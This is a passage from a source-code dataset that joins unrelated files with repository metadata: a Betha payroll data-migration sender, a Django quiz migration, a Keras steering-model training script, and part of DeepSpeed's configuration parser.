20a59d30363f13db08a271bd7d4156a4795b5037 | 9fa71d5834dae1c8900b3444f564b11326374d36 | /packages/ipm_cloud_postgresql/folha/rotinas_envio/tipo-afastamento.py | 81f76c9ccfb467f9f87b432e8845eb17d8d9c18f | [] | no_license | JoaoPauloLeal/toolbox | a85e726cfeb74603cb64d73c4af64757a9a60db7 | 924c063ba81395aeddc039a51f8365c02e527963 | refs/heads/master | 2023-06-07T02:17:42.069985 | 2021-06-28T19:06:40 | 2021-06-28T19:06:40 | 381,128,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,411 | py | import packages.ipm_cloud_postgresql.model as model
import bth.interacao_cloud as interacao_cloud
import json
import logging
from datetime import datetime
tipo_registro = 'tipo-afastamento'
sistema = 300
limite_lote = 500
url = "https://pessoal.cloud.betha.com.br/service-layer/v1/api/tipo-afastamento"
def iniciar_processo_envio(params_exec, *args, **kwargs):
dados_assunto = coletar_dados(params_exec)
dados_enviar = pre_validar(params_exec, dados_assunto)
if not params_exec.get('somente_pre_validar'):
iniciar_envio(params_exec, dados_enviar, 'POST')
model.valida_lotes_enviados(params_exec, tipo_registro=tipo_registro)
def coletar_dados(params_exec):
print('- Iniciando a consulta dos dados a enviar.')
df = None
try:
query = model.get_consulta(params_exec, tipo_registro + '.sql')
pgcnn = model.PostgreSQLConnection()
df = pgcnn.exec_sql(query, index_col='id')
print(f'- Consulta finalizada. {len(df.index)} registro(s) encontrado(s).')
except Exception as error:
print(f'Erro ao executar função {tipo_registro}. {error}')
finally:
return df
def pre_validar(params_exec, dados):
print('- Iniciando pré-validação dos registros.')
dados_validados = []
registro_erros = []
try:
lista_dados = dados.to_dict('records')
for linha in lista_dados:
registro_valido = True
if registro_valido:
dados_validados.append(linha)
print(f'- Pré-validação finalizada. Registros validados com sucesso: '
f'{len(dados_validados)} | Registros com advertência: {len(registro_erros)}')
except Exception as error:
logging.error(f'Erro ao executar função "pre_validar". {error}')
finally:
return dados_validados
def iniciar_envio(params_exec, dados, metodo, *args, **kwargs):
print('- Iniciando envio dos dados.')
lista_dados_enviar = []
lista_controle_migracao = []
hoje = datetime.now().strftime("%Y-%m-%d")
token = params_exec['token']
contador = 0
for item in dados:
hash_chaves = model.gerar_hash_chaves(sistema, tipo_registro, item['id_entidade'], item['codigo'])
dict_dados = {
'idIntegracao': hash_chaves,
'conteudo': {
'descricao': None if 'descricao' not in item else item['descricao'],
'classificacao': None if 'classificacao' not in item else item['classificacao'],
'tipoMovimentacaoPessoal': None if 'tipomovimentacaopessoal' not in item else item['tipomovimentacaopessoal'],
'diasPrevistos': None if 'diasprevistos' not in item else item['diasprevistos'],
'perdeTempoServico': None if 'perdetemposervico' not in item else item['perdetemposervico'],
'consideraVencimento': None if 'consideravencimento' not in item else item['consideravencimento'],
'reduz13Salario': None if 'reduz13salario' not in item else item['reduz13salario'],
'reduzFerias': None if 'reduzferias' not in item else item['reduzferias'],
'justificado': None if 'justificado' not in item else item['justificado'],
'reduzFgts': None if 'reduzfgts' not in item else item['reduzfgts']
}
}
contador += 1
print(f'Dados gerados ({contador}): ', dict_dados)
lista_dados_enviar.append(dict_dados)
lista_controle_migracao.append({
'sistema': sistema,
'tipo_registro': tipo_registro,
'hash_chave_dsk': hash_chaves,
'descricao_tipo_registro': 'Cadastro de Tipo de Afastamento',
'id_gerado': None,
'i_chave_dsk1': item['id_entidade'],
'i_chave_dsk2': item['codigo']
})
if True:
model.insere_tabela_controle_migracao_registro2(params_exec, lista_req=lista_controle_migracao)
req_res = interacao_cloud.preparar_requisicao(lista_dados=lista_dados_enviar,
token=token,
url=url,
tipo_registro=tipo_registro,
tamanho_lote=limite_lote)
model.insere_tabela_controle_lote(req_res)
print('- Envio de dados finalizado.') | [
"joao.leal@betha.com.br"
] | joao.leal@betha.com.br |
89f75ed219421260a08f7f0fe6a80bf48514550a | b8b82e0723c681ab16578ce8e0e5389384fb2a2a | /Trivia Quiz Project/djangoproject/quizsite/quiz/migrations/0019_auto_20180617_1342.py | 7b3598bfba32f4d33e1675986c1c0b395b68e318 | [] | no_license | ml-barnes/django-project | 88a9dd008c761f53431a189b8b1c81c7b39ef35f | 3e2263bfb790466abf55ab396713bfd9032d014c | refs/heads/master | 2020-03-29T01:15:54.961683 | 2018-09-19T02:55:32 | 2018-09-19T02:55:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 476 | py | # Generated by Django 2.0.3 on 2018-06-17 01:42
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('quiz', '0018_auto_20180617_1341'),
]
operations = [
migrations.AlterField(
model_name='quiz',
name='difficulty',
field=models.CharField(choices=[('', 'No preference'), ('E', 'easy'), ('M', 'medium'), ('H', 'hard')], default='', max_length=2),
),
]
| [
"barnm7@student.op.ac.nz"
] | barnm7@student.op.ac.nz |
0f91441b9043d804d08893814aadd439963285a9 | d50807442176f08bc6e1a6a905f4158e3a14f94e | /model.py | f11c9d044a475f106cc34adf806e79c805f7ef05 | [] | no_license | rout-sarthak/P3-U-sdcnd-Behavorial-Cloning | ec76cb96eeabf7bb12ba831234ec8767df492914 | e5ebd575e1116f30e217c235d1b3d0b2a68c37b8 | refs/heads/master | 2020-06-19T14:17:22.416874 | 2019-07-13T16:07:05 | 2019-07-13T16:07:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,461 | py | import tensorflow as tf
from keras.layers import Dense, Flatten, Lambda, Activation, MaxPooling2D
from keras.layers.convolutional import Convolution2D
from keras.models import Sequential
from keras.optimizers import Adam
import helper
epochs = 8
epoch_samples = 20032
learning_rate = 1e-4
validation_set = 6400
activate_relu = 'relu'
tf.python.control_flow_ops = tf
# NVIDIA's "End to End Learning for Self-Driving Cars" paper was used for developing this model https://images.nvidia.com/content/tegra/automotive/images/2016/solutions/pdf/end-to-end-dl-using-px.pdf
model = Sequential()
model.add(Lambda(lambda x: x / 127.5 - 1.0, input_shape=(64, 64, 3)))
# The first five convolutional and maxpooling layers
model.add(Convolution2D(24, 5, 5, border_mode='same', subsample=(2, 2)))
model.add(Activation(activate_relu))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(1, 1)))
model.add(Convolution2D(36, 5, 5, border_mode='same', subsample=(2, 2)))
model.add(Activation(activate_relu))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(1, 1)))
model.add(Convolution2D(48, 5, 5, border_mode='same', subsample=(2, 2)))
model.add(Activation(activate_relu))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(1, 1)))
model.add(Convolution2D(64, 3, 3, border_mode='same', subsample=(1, 1)))
model.add(Activation(activate_relu))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(1, 1)))
model.add(Convolution2D(64, 3, 3, border_mode='same', subsample=(1, 1)))
model.add(Activation(activate_relu))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(1, 1)))
model.add(Flatten())
# Next, five fully connected layers
model.add(Dense(1164))
model.add(Activation(activate_relu))
model.add(Dense(100))
model.add(Activation(activate_relu))
model.add(Dense(50))
model.add(Activation(activate_relu))
model.add(Dense(10))
model.add(Activation(activate_relu))
model.add(Dense(1))
model.summary()
model.compile(optimizer=Adam(learning_rate), loss="mse", )
# separate generators for training and validation
train_gen = helper.generate_next_batch()
validation_gen = helper.generate_next_batch()
history = model.fit_generator(train_gen,
samples_per_epoch=epoch_samples,
nb_epoch=epochs,
validation_data=validation_gen,
nb_val_samples=validation_set,
verbose=1)
helper.save_model(model) #saving model and weights
| [
"noreply@github.com"
] | rout-sarthak.noreply@github.com |
e486a8fff0f2ff861e17eeb4ef823779cde18389 | 870143dccb3ced8fb2095f989cb7eef5787c0489 | /deepspeed/runtime/config.py | 26c10f3b0e350e97257bf65528d7145fa8b2bc90 | [
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | tanghl1994/DeepSpeed | 56650ecd59184dae643d3a9ed6bb3d0406d6521a | 509ccbf4d8769b145aa1608f97b49c0f29ccc6cf | refs/heads/master | 2022-12-20T18:35:14.783378 | 2020-09-09T19:21:11 | 2020-09-09T19:21:11 | 293,631,664 | 0 | 0 | null | 2020-09-07T21:01:38 | 2020-09-07T21:01:37 | null | UTF-8 | Python | false | false | 26,476 | py | """
Copyright (c) Microsoft Corporation
Licensed under the MIT license.
"""
import torch
import json
import copy
from deepspeed.runtime.constants import *
from deepspeed.runtime.fp16.loss_scaler import INITIAL_LOSS_SCALE, SCALE_WINDOW, DELAYED_SHIFT, MIN_LOSS_SCALE
from deepspeed.runtime.config_utils import get_scalar_param, dict_raise_error_on_duplicate_keys
from deepspeed.runtime.zero.config import DeepSpeedZeroConfig
from deepspeed.runtime.activation_checkpointing.config import DeepSpeedActivationCheckpointingConfig
from deepspeed.utils import logger
# Alignment (in elements) used so tensor sizes map cleanly onto Tensor Core tiles.
TENSOR_CORE_ALIGN_SIZE = 8

# String identifiers for the optimizers DeepSpeed implements natively.
ADAM_OPTIMIZER = 'adam'
LAMB_OPTIMIZER = 'lamb'
# Optimizer names that select a DeepSpeed-provided implementation (vs. a torch one).
DEEPSPEED_OPTIMIZERS = [ADAM_OPTIMIZER, LAMB_OPTIMIZER]
def get_amp_enabled(param_dict):
    """Return the 'enabled' flag of the 'amp' config section, or False if absent."""
    if AMP not in param_dict.keys():
        return False
    return get_scalar_param(param_dict[AMP], AMP_ENABLED, AMP_ENABLED_DEFAULT)
def get_amp_params(param_dict):
if AMP in param_dict.keys():
amp_params = copy.copy(param_dict[AMP])
amp_params.pop(AMP_ENABLED)
return amp_params
else:
return False
def get_fp16_enabled(param_dict):
    """Return the 'enabled' flag of the 'fp16' config section, or False if absent."""
    if FP16 not in param_dict.keys():
        return False
    return get_scalar_param(param_dict[FP16], FP16_ENABLED, FP16_ENABLED_DEFAULT)
def get_loss_scale(param_dict):
    """Return the configured fp16 loss scale; falls back to the default when
    fp16 is disabled or the key is not present."""
    if not get_fp16_enabled(param_dict):
        return FP16_LOSS_SCALE_DEFAULT
    return get_scalar_param(param_dict[FP16],
                            FP16_LOSS_SCALE,
                            FP16_LOSS_SCALE_DEFAULT)
def get_initial_dynamic_scale(param_dict):
    """Return the starting dynamic loss scale, computed as
    2 ** initial_scale_power from the fp16 section (default power otherwise)."""
    scale_power = (get_scalar_param(param_dict[FP16],
                                    FP16_INITIAL_SCALE_POWER,
                                    FP16_INITIAL_SCALE_POWER_DEFAULT)
                   if get_fp16_enabled(param_dict) else
                   FP16_INITIAL_SCALE_POWER_DEFAULT)
    return 2**scale_power
def get_dynamic_loss_scale_args(param_dict):
    """Build the kwargs dict for the dynamic loss scaler from the fp16 section.

    Returns None when fp16 is disabled or when none of the dynamic-scaling
    keys (initial scale power, window, min scale, hysteresis) appear in the
    fp16 section.
    """
    if not get_fp16_enabled(param_dict):
        return None

    fp16_dict = param_dict[FP16]
    dynamic_keys = (FP16_INITIAL_SCALE_POWER,
                    FP16_LOSS_SCALE_WINDOW,
                    FP16_MIN_LOSS_SCALE,
                    FP16_HYSTERESIS)
    if not any(key in fp16_dict for key in dynamic_keys):
        return None

    init_scale_power = get_scalar_param(fp16_dict,
                                        FP16_INITIAL_SCALE_POWER,
                                        FP16_INITIAL_SCALE_POWER_DEFAULT)
    return {
        INITIAL_LOSS_SCALE: 2**init_scale_power,
        SCALE_WINDOW: get_scalar_param(fp16_dict,
                                       FP16_LOSS_SCALE_WINDOW,
                                       FP16_LOSS_SCALE_WINDOW_DEFAULT),
        DELAYED_SHIFT: get_scalar_param(fp16_dict,
                                        FP16_HYSTERESIS,
                                        FP16_HYSTERESIS_DEFAULT),
        MIN_LOSS_SCALE: get_scalar_param(fp16_dict,
                                         FP16_MIN_LOSS_SCALE,
                                         FP16_MIN_LOSS_SCALE_DEFAULT)
    }
def get_gradient_accumulation_steps(param_dict):
    """Return the configured gradient accumulation steps, or the default."""
    return get_scalar_param(param_dict,
                            GRADIENT_ACCUMULATION_STEPS,
                            GRADIENT_ACCUMULATION_STEPS_DEFAULT)
def get_sparse_gradients_enabled(param_dict):
    """Return whether sparse-gradient communication is enabled in the config."""
    return get_scalar_param(param_dict, SPARSE_GRADIENTS, SPARSE_GRADIENTS_DEFAULT)
def get_zero_optimization(param_dict):
    """Return the raw 'zero_optimization' config value, or its default."""
    return get_scalar_param(param_dict, ZERO_OPTIMIZATION, ZERO_OPTIMIZATION_DEFAULT)
def get_zero_reduce_scatter(param_dict):
    """Return whether ZeRO should use reduce-scatter for gradient averaging."""
    return get_scalar_param(param_dict, ZERO_REDUCE_SCATTER, ZERO_REDUCE_SCATTER_DEFAULT)
def get_zero_max_elements_per_comm(param_dict):
    """Return the max number of elements per ZeRO communication call."""
    return get_scalar_param(param_dict,
                            ZERO_MAX_ELEMENTS_PER_COMM,
                            ZERO_MAX_ELEMENTS_PER_COMM_DEFAULT)
def get_allgather_size(param_dict):
    """Return the configured allgather chunk size.

    Non-positive configured values are treated as invalid and replaced by
    the default. The original implementation evaluated the same
    get_scalar_param call twice; here it is hoisted into one local.
    """
    allgather_size = get_scalar_param(param_dict,
                                      ALLGATHER_SIZE,
                                      ALLGATHER_SIZE_DEFAULT)
    return allgather_size if allgather_size > 0 else ALLGATHER_SIZE_DEFAULT
def get_allreduce_always_fp32(param_dict):
    """Return whether gradient allreduce should always be performed in fp32."""
    return get_scalar_param(param_dict, FP32_ALLREDUCE, FP32_ALLREDUCE_DEFAULT)
def get_prescale_gradients(param_dict):
    """Return whether gradients are scaled before (vs. after) allreduce."""
    return get_scalar_param(param_dict, PRESCALE_GRADIENTS, PRESCALE_GRADIENTS_DEFAULT)
def get_gradient_predivide_factor(param_dict):
    """Return the factor by which gradients are pre-divided before allreduce."""
    return get_scalar_param(param_dict,
                            GRADIENT_PREDIVIDE_FACTOR,
                            GRADIENT_PREDIVIDE_FACTOR_DEFAULT)
def get_steps_per_print(param_dict):
    """Return how many training steps elapse between progress log lines."""
    return get_scalar_param(param_dict, STEPS_PER_PRINT, STEPS_PER_PRINT_DEFAULT)
def get_disable_allgather(param_dict):
    """Return whether the allgather step is disabled in the config."""
    return get_scalar_param(param_dict, DISABLE_ALLGATHER, DISABLE_ALLGATHER_DEFAULT)
def get_dump_state(param_dict):
    """Return whether engine state dumping (for debugging) is enabled."""
    return get_scalar_param(param_dict, DUMP_STATE, DUMP_STATE_DEFAULT)
def get_gradient_clipping(param_dict):
    """Return the gradient clipping threshold, or its default if unset."""
    return get_scalar_param(param_dict, GRADIENT_CLIPPING, GRADIENT_CLIPPING_DEFAULT)
def get_sparse_attention(param_dict):
    """Return the parsed sparse-attention config dict, or None when the
    SPARSE_ATTENTION section is absent.

    Raises NotImplementedError for an unrecognized sparsity mode.
    """
    if SPARSE_ATTENTION not in param_dict.keys():
        return None
    sparsity = param_dict[SPARSE_ATTENTION]
    mode = get_sparse_attention_mode(sparsity)
    # Mode -> builder dispatch table.
    builders = {
        SPARSE_DENSE_MODE: get_sparse_dense_config,
        SPARSE_FIXED_MODE: get_sparse_fixed_config,
        SPARSE_VARIABLE_MODE: get_sparse_variable_config,
        SPARSE_BIGBIRD_MODE: get_sparse_bigbird_config,
        SPARSE_BSLONGFORMER_MODE: get_sparse_bslongformer_config,
    }
    if mode not in builders:
        raise NotImplementedError(
            f'Given sparsity mode, {mode}, has not been implemented yet!')
    return builders[mode](sparsity)
def get_sparse_dense_config(sparsity):
    """Build the config dict for the 'dense' sparse-attention mode."""
    block = get_scalar_param(sparsity, SPARSE_BLOCK, SPARSE_BLOCK_DEFAULT)
    return {SPARSE_MODE: SPARSE_DENSE_MODE, SPARSE_BLOCK: block}
def get_sparse_fixed_config(sparsity):
    """Build the config dict for the 'fixed' sparse-attention mode.

    Reads each sub-key via get_scalar_param with its module-level default.
    """
    block = get_scalar_param(sparsity, SPARSE_BLOCK, SPARSE_BLOCK_DEFAULT)
    different_layout_per_head = get_scalar_param(
        sparsity,
        SPARSE_DIFFERENT_LAYOUT_PER_HEAD,
        SPARSE_DIFFERENT_LAYOUT_PER_HEAD_DEFAULT)
    num_local_blocks = get_scalar_param(sparsity,
                                        SPARSE_NUM_LOCAL_BLOCKS,
                                        SPARSE_NUM_LOCAL_BLOCKS_DEFAULT)
    num_global_blocks = get_scalar_param(sparsity,
                                         SPARSE_NUM_GLOBAL_BLOCKS,
                                         SPARSE_NUM_GLOBAL_BLOCKS_DEFAULT)
    attention = get_scalar_param(sparsity,
                                 SPARSE_ATTENTION_TYPE,
                                 SPARSE_ATTENTION_TYPE_DEFAULT)
    horizontal_global_attention = get_scalar_param(
        sparsity,
        SPARSE_HORIZONTAL_GLOBAL_ATTENTION,
        SPARSE_HORIZONTAL_GLOBAL_ATTENTION_DEFAULT)
    num_different_global_patterns = get_scalar_param(
        sparsity,
        SPARSE_NUM_DIFFERENT_GLOBAL_PATTERNS,
        SPARSE_NUM_DIFFERENT_GLOBAL_PATTERNS_DEFAULT)
    return {
        SPARSE_MODE: SPARSE_FIXED_MODE,
        SPARSE_BLOCK: block,
        SPARSE_DIFFERENT_LAYOUT_PER_HEAD: different_layout_per_head,
        SPARSE_NUM_LOCAL_BLOCKS: num_local_blocks,
        SPARSE_NUM_GLOBAL_BLOCKS: num_global_blocks,
        SPARSE_ATTENTION_TYPE: attention,
        SPARSE_HORIZONTAL_GLOBAL_ATTENTION: horizontal_global_attention,
        SPARSE_NUM_DIFFERENT_GLOBAL_PATTERNS: num_different_global_patterns
    }
def get_sparse_variable_config(sparsity):
    """Build the config dict for the 'variable' sparse-attention mode."""
    block = get_scalar_param(sparsity, SPARSE_BLOCK, SPARSE_BLOCK_DEFAULT)
    different_layout_per_head = get_scalar_param(
        sparsity,
        SPARSE_DIFFERENT_LAYOUT_PER_HEAD,
        SPARSE_DIFFERENT_LAYOUT_PER_HEAD_DEFAULT)
    num_random_blocks = get_scalar_param(sparsity,
                                         SPARSE_NUM_RANDOM_BLOCKS,
                                         SPARSE_NUM_RANDOM_BLOCKS_DEFAULT)
    local_window_blocks = get_scalar_param(sparsity,
                                           SPARSE_LOCAL_WINDOW_BLOCKS,
                                           SPARSE_LOCAL_WINDOW_BLOCKS_DEFAULT)
    global_block_indices = get_scalar_param(sparsity,
                                            SPARSE_GLOBAL_BLOCK_INDICES,
                                            SPARSE_GLOBAL_BLOCK_INDICES_DEFAULT)
    global_block_end_indices = get_scalar_param(sparsity,
                                                SPARSE_GLOBAL_BLOCK_END_INDICES,
                                                SPARSE_GLOBAL_BLOCK_END_INDICES_DEFAULT)
    attention = get_scalar_param(sparsity,
                                 SPARSE_ATTENTION_TYPE,
                                 SPARSE_ATTENTION_TYPE_DEFAULT)
    horizontal_global_attention = get_scalar_param(
        sparsity,
        SPARSE_HORIZONTAL_GLOBAL_ATTENTION,
        SPARSE_HORIZONTAL_GLOBAL_ATTENTION_DEFAULT)
    return {
        SPARSE_MODE: SPARSE_VARIABLE_MODE,
        SPARSE_BLOCK: block,
        SPARSE_DIFFERENT_LAYOUT_PER_HEAD: different_layout_per_head,
        SPARSE_NUM_RANDOM_BLOCKS: num_random_blocks,
        SPARSE_LOCAL_WINDOW_BLOCKS: local_window_blocks,
        SPARSE_GLOBAL_BLOCK_INDICES: global_block_indices,
        SPARSE_GLOBAL_BLOCK_END_INDICES: global_block_end_indices,
        SPARSE_ATTENTION_TYPE: attention,
        SPARSE_HORIZONTAL_GLOBAL_ATTENTION: horizontal_global_attention
    }
def get_sparse_bigbird_config(sparsity):
    """Build the config dict for the 'bigbird' sparse-attention mode."""
    block = get_scalar_param(sparsity, SPARSE_BLOCK, SPARSE_BLOCK_DEFAULT)
    different_layout_per_head = get_scalar_param(
        sparsity,
        SPARSE_DIFFERENT_LAYOUT_PER_HEAD,
        SPARSE_DIFFERENT_LAYOUT_PER_HEAD_DEFAULT)
    num_random_blocks = get_scalar_param(sparsity,
                                         SPARSE_NUM_RANDOM_BLOCKS,
                                         SPARSE_NUM_RANDOM_BLOCKS_DEFAULT)
    num_sliding_window_blocks = get_scalar_param(
        sparsity,
        SPARSE_NUM_SLIDING_WINDOW_BLOCKS,
        SPARSE_NUM_SLIDING_WINDOW_BLOCKS_DEFAULT)
    num_global_blocks = get_scalar_param(sparsity,
                                         SPARSE_NUM_GLOBAL_BLOCKS,
                                         SPARSE_NUM_GLOBAL_BLOCKS_DEFAULT)
    return {
        SPARSE_MODE: SPARSE_BIGBIRD_MODE,
        SPARSE_BLOCK: block,
        SPARSE_DIFFERENT_LAYOUT_PER_HEAD: different_layout_per_head,
        SPARSE_NUM_RANDOM_BLOCKS: num_random_blocks,
        SPARSE_NUM_SLIDING_WINDOW_BLOCKS: num_sliding_window_blocks,
        SPARSE_NUM_GLOBAL_BLOCKS: num_global_blocks
    }
def get_sparse_bslongformer_config(sparsity):
    """Build the config dict for the 'bslongformer' sparse-attention mode."""
    block = get_scalar_param(sparsity, SPARSE_BLOCK, SPARSE_BLOCK_DEFAULT)
    different_layout_per_head = get_scalar_param(
        sparsity,
        SPARSE_DIFFERENT_LAYOUT_PER_HEAD,
        SPARSE_DIFFERENT_LAYOUT_PER_HEAD_DEFAULT)
    num_sliding_window_blocks = get_scalar_param(
        sparsity,
        SPARSE_NUM_SLIDING_WINDOW_BLOCKS,
        SPARSE_NUM_SLIDING_WINDOW_BLOCKS_DEFAULT)
    global_block_indices = get_scalar_param(sparsity,
                                            SPARSE_GLOBAL_BLOCK_INDICES,
                                            SPARSE_GLOBAL_BLOCK_INDICES_DEFAULT)
    global_block_end_indices = get_scalar_param(sparsity,
                                                SPARSE_GLOBAL_BLOCK_END_INDICES,
                                                SPARSE_GLOBAL_BLOCK_END_INDICES_DEFAULT)
    return {
        SPARSE_MODE: SPARSE_BSLONGFORMER_MODE,
        SPARSE_BLOCK: block,
        SPARSE_DIFFERENT_LAYOUT_PER_HEAD: different_layout_per_head,
        SPARSE_NUM_SLIDING_WINDOW_BLOCKS: num_sliding_window_blocks,
        SPARSE_GLOBAL_BLOCK_INDICES: global_block_indices,
        SPARSE_GLOBAL_BLOCK_END_INDICES: global_block_end_indices
    }
def get_sparse_attention_mode(param_dict):
    """Return the sparsity mode from a sparse-attention sub-dict (with default)."""
    if SPARSE_MODE in param_dict.keys():
        return param_dict[SPARSE_MODE]
    else:
        return SPARSE_MODE_DEFAULT
def get_sparse_attention_type(param_dict):
    """Return the sparse-attention type from the sub-dict (with default)."""
    if SPARSE_ATTENTION_TYPE in param_dict.keys():
        return param_dict[SPARSE_ATTENTION_TYPE]
    else:
        return SPARSE_ATTENTION_TYPE_DEFAULT
def get_optimizer_name(param_dict):
    """Return the configured optimizer type, or the module default when absent."""
    if OPTIMIZER in param_dict.keys() and \
            TYPE in param_dict[OPTIMIZER].keys():
        return param_dict[OPTIMIZER][TYPE]
    else:
        return OPTIMIZER_TYPE_DEFAULT
def get_optimizer_params(param_dict):
    """Return the optimizer params sub-dict, or None when not configured."""
    if get_optimizer_name(param_dict) is not None and \
            OPTIMIZER_PARAMS in param_dict[OPTIMIZER].keys():
        return param_dict[OPTIMIZER][OPTIMIZER_PARAMS]
    else:
        return None
def get_optimizer_gradient_clipping(param_dict):
    """Return the optimizer's MAX_GRAD_NORM value, or None when not set."""
    optimizer_params = get_optimizer_params(param_dict)
    if optimizer_params is not None and \
            MAX_GRAD_NORM in optimizer_params.keys():
        return optimizer_params[MAX_GRAD_NORM]
    else:
        return None
def get_optimizer_legacy_fusion(param_dict):
    """Return the optimizer LEGACY_FUSION flag (or its default)."""
    if OPTIMIZER in param_dict.keys() and \
            LEGACY_FUSION in param_dict[OPTIMIZER].keys():
        return param_dict[OPTIMIZER][LEGACY_FUSION]
    else:
        return LEGACY_FUSION_DEFAULT
def get_zero_allow_untested_optimizer(param_dict):
    """Return the ZERO_ALLOW_UNTESTED_OPTIMIZER setting (or its default)."""
    return get_scalar_param(param_dict,
                            ZERO_ALLOW_UNTESTED_OPTIMIZER,
                            ZERO_ALLOW_UNTESTED_OPTIMIZER_DEFAULT)
def get_scheduler_name(param_dict):
    """Return the configured LR-scheduler type, or the module default."""
    if SCHEDULER in param_dict.keys() and \
            TYPE in param_dict[SCHEDULER].keys():
        return param_dict[SCHEDULER][TYPE]
    else:
        return SCHEDULER_TYPE_DEFAULT
def get_scheduler_params(param_dict):
    """Return the scheduler params sub-dict, or None when not configured."""
    if get_scheduler_name(param_dict) is not None and \
            SCHEDULER_PARAMS in param_dict[SCHEDULER].keys():
        return param_dict[SCHEDULER][SCHEDULER_PARAMS]
    else:
        return None
def get_train_batch_size(param_dict):
    """Return the TRAIN_BATCH_SIZE setting (or its default)."""
    return get_scalar_param(param_dict, TRAIN_BATCH_SIZE, TRAIN_BATCH_SIZE_DEFAULT)
def get_train_micro_batch_size_per_gpu(param_dict):
    """Return the TRAIN_MICRO_BATCH_SIZE_PER_GPU setting (or its default)."""
    return get_scalar_param(param_dict,
                            TRAIN_MICRO_BATCH_SIZE_PER_GPU,
                            TRAIN_MICRO_BATCH_SIZE_PER_GPU_DEFAULT)
def get_wall_clock_breakdown(param_dict):
    """Return the WALL_CLOCK_BREAKDOWN setting (or its default)."""
    return get_scalar_param(param_dict,
                            WALL_CLOCK_BREAKDOWN,
                            WALL_CLOCK_BREAKDOWN_DEFAULT)
def get_memory_breakdown(param_dict):
    """Return the MEMORY_BREAKDOWN setting (or its default)."""
    return get_scalar_param(param_dict, MEMORY_BREAKDOWN, MEMORY_BREAKDOWN_DEFAULT)
def get_tensorboard_enabled(param_dict):
    """Return whether the TENSORBOARD section enables logging (False if absent)."""
    if TENSORBOARD in param_dict.keys():
        return get_scalar_param(param_dict[TENSORBOARD],
                                TENSORBOARD_ENABLED,
                                TENSORBOARD_ENABLED_DEFAULT)
    else:
        return False
def get_tensorboard_output_path(param_dict):
    """Return the tensorboard output path; the default when tensorboard is off."""
    if get_tensorboard_enabled(param_dict):
        return get_scalar_param(param_dict[TENSORBOARD],
                                TENSORBOARD_OUTPUT_PATH,
                                TENSORBOARD_OUTPUT_PATH_DEFAULT)
    else:
        return TENSORBOARD_OUTPUT_PATH_DEFAULT
def get_tensorboard_job_name(param_dict):
    """Return the tensorboard job name; the default when tensorboard is off."""
    if get_tensorboard_enabled(param_dict):
        return get_scalar_param(param_dict[TENSORBOARD],
                                TENSORBOARD_JOB_NAME,
                                TENSORBOARD_JOB_NAME_DEFAULT)
    else:
        return TENSORBOARD_JOB_NAME_DEFAULT
'''Write deepspeed config files by modifying basic templates.
Can be used for quickly changing parameters via command line parameters.'''
class DeepSpeedConfigWriter:
    """Builds or edits a DeepSpeed config dict and round-trips it through JSON.

    Useful for quickly overriding template parameters from the command line.
    """
    def __init__(self, data=None):
        # Avoid a shared mutable default: each writer gets its own dict.
        self.data = data if data is not None else {}

    def add_config(self, key, value):
        """Set a single top-level config entry."""
        self.data[key] = value

    def load_config(self, filename):
        """Replace the current data with the JSON content of *filename*.

        Duplicate keys in the file raise via dict_raise_error_on_duplicate_keys.
        """
        # `with` closes the handle; the old code leaked it via a bare open().
        with open(filename, 'r') as f:
            self.data = json.load(
                f,
                object_pairs_hook=dict_raise_error_on_duplicate_keys)

    def write_config(self, filename):
        """Serialize the current data to *filename* as JSON."""
        with open(filename, 'w') as outfile:
            json.dump(self.data, outfile)
class DeepSpeedConfig(object):
    """Parses, derives and validates the DeepSpeed runtime configuration.

    Values come either from *json_file* or from an already-parsed
    *param_dict*. When *mpu* (a model-parallel unit) is given, the
    data-parallel world size is used instead of the global world size.
    """
    def __init__(self, json_file, mpu=None, param_dict=None):
        super(DeepSpeedConfig, self).__init__()
        if param_dict is None:
            self._param_dict = json.load(
                open(json_file,
                     'r'),
                object_pairs_hook=dict_raise_error_on_duplicate_keys)
        else:
            self._param_dict = param_dict
        # Fall back to single-process defaults when torch.distributed is not
        # initialized (e.g. unit tests or single-process runs).
        try:
            self.global_rank = torch.distributed.get_rank()
            if mpu is None:
                self.world_size = torch.distributed.get_world_size()
            else:
                self.world_size = mpu.get_data_parallel_world_size()
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # are no longer swallowed here.
            self.global_rank = 0
            self.world_size = 1
        self._initialize_params(self._param_dict)
        self._configure_train_batch_size()
        self._do_sanity_check()
    def _initialize_params(self, param_dict):
        """Read every supported setting from the raw config dict onto self."""
        self.train_batch_size = get_train_batch_size(param_dict)
        self.train_micro_batch_size_per_gpu = get_train_micro_batch_size_per_gpu(
            param_dict)
        self.gradient_accumulation_steps = get_gradient_accumulation_steps(param_dict)
        self.steps_per_print = get_steps_per_print(param_dict)
        self.dump_state = get_dump_state(param_dict)
        self.disable_allgather = get_disable_allgather(param_dict)
        self.allreduce_always_fp32 = get_allreduce_always_fp32(param_dict)
        self.prescale_gradients = get_prescale_gradients(param_dict)
        self.gradient_predivide_factor = get_gradient_predivide_factor(param_dict)
        self.sparse_gradients_enabled = get_sparse_gradients_enabled(param_dict)
        self.allgather_size = get_allgather_size(param_dict)
        self.zero_config = DeepSpeedZeroConfig(param_dict)
        self.zero_optimization_stage = self.zero_config.stage
        self.zero_enabled = self.zero_optimization_stage > 0
        self.activation_checkpointing_config = DeepSpeedActivationCheckpointingConfig(
            param_dict)
        self.gradient_clipping = get_gradient_clipping(param_dict)
        self.fp16_enabled = get_fp16_enabled(param_dict)
        self.amp_enabled = get_amp_enabled(param_dict)
        self.amp_params = get_amp_params(param_dict)
        self.loss_scale = get_loss_scale(param_dict)
        self.initial_dynamic_scale = get_initial_dynamic_scale(param_dict)
        self.dynamic_loss_scale_args = get_dynamic_loss_scale_args(param_dict)
        self.optimizer_name = get_optimizer_name(param_dict)
        # Canonicalize DeepSpeed-native optimizer names to lowercase.
        if self.optimizer_name is not None and \
            self.optimizer_name.lower() in DEEPSPEED_OPTIMIZERS:
            self.optimizer_name = self.optimizer_name.lower()
